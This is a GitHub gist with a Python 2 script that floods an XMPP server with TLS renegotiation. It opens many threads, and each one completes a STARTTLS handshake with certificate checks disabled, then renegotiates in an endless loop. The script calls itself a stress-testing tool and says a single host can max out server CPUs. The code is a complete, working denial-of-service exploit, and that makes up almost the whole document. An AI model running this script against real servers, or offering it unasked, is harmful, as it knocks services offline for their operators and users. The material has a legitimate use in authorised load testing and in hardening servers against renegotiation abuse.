Created
December 12, 2017 20:44
-
-
Save bitrot-sh/21b88f32f9c3328fc279c5ba3ae48312 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
""" | |
This tool is written as a stress testing tool to identify vulnerable servers. | |
Use the tool legally and responsibly. | |
Example: ./xmpp_dos.py localhost 5222 -t 10 | |
A single host with 10 threads can often max out server CPUs. | |
""" | |
from __future__ import print_function | |
from socket import socket, AF_INET, SOCK_STREAM | |
from sys import exit | |
from time import sleep | |
from optparse import OptionParser | |
from nassl import TLSV1, SSL_VERIFY_NONE | |
from nassl.DebugSslClient import DebugSslClient | |
import threading | |
XMPP_OPEN_STREAM = ("<stream:stream xmlns='jabber:client' xmlns:stream='" | |
"http://etherx.jabber.org/streams' xmlns:tls='http://www.ietf.org/rfc/" | |
"rfc2595.txt' to='{0}' xml:lang='en' version='1.0'>" ) | |
XMPP_STARTTLS = "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>" | |
class SSLThread(threading.Thread): | |
def __init__(self, tid, host, port): | |
threading.Thread.__init__(self) | |
self.tid = tid | |
self.host = host | |
self.port = port | |
self.sock = None | |
self.ssl = None | |
def run(self): | |
self.reconnect() | |
self.renegotiate() | |
def connect(self): | |
print("[+] Thread %d: Connecting" % self.tid) | |
self.sock = socket(AF_INET, SOCK_STREAM) | |
self.sock.settimeout(5) | |
self.sock.connect((self.host, self.port)) | |
def starttls(self): | |
self.sock.send(XMPP_OPEN_STREAM.format(self.host)) | |
resp = self.sock.recv(4096) | |
if '<stream:error>' in resp: | |
print("[!] Error connecting to %s:%d" % (self.host, self.port)) | |
exit(1) | |
elif '</stream:features>' not in resp: | |
self.sock.recv(4096) | |
self.sock.send(XMPP_STARTTLS) | |
resp = self.sock.recv(2048) | |
def negotiate(self): | |
self.ssl = DebugSslClient(sslVersion=TLSV1, sock=self.sock, sslVerify=SSL_VERIFY_NONE) | |
self.ssl.do_handshake() | |
def reconnect(self): | |
self.connect() | |
self.starttls() | |
self.negotiate() | |
def renegotiate(self): | |
while 1: | |
try: | |
self.ssl.do_renegotiate() | |
except Exception: | |
self.reconnect() | |
def main(): | |
print("[+] XMPP SSL/TLS renegotiation stress testing tool") | |
usage = "usage: %prog [options] host port" | |
parser = OptionParser(usage=usage) | |
parser.add_option("-t", "--threads", dest="threads", help="Number of threads", default=5) | |
(options, args) = parser.parse_args() | |
num_threads = int(options.threads) | |
if len(args) != 2: | |
parser.print_usage() | |
exit(1) | |
host = args[0] | |
try: | |
port = int(args[1]) | |
except ValueError: | |
print("[!] Invalid port %s" % str(args[1])) | |
exit(1) | |
threads = [] | |
for x in xrange(0, num_threads): | |
threads.append(SSLThread(x, host, port)) | |
threads[x].daemon = True | |
threads[x].start() | |
try: | |
while True: | |
sleep(100) | |
except (KeyboardInterrupt, SystemExit): | |
print("[+] Stopping threads!") | |
exit(0) | |
if __name__=='__main__': | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment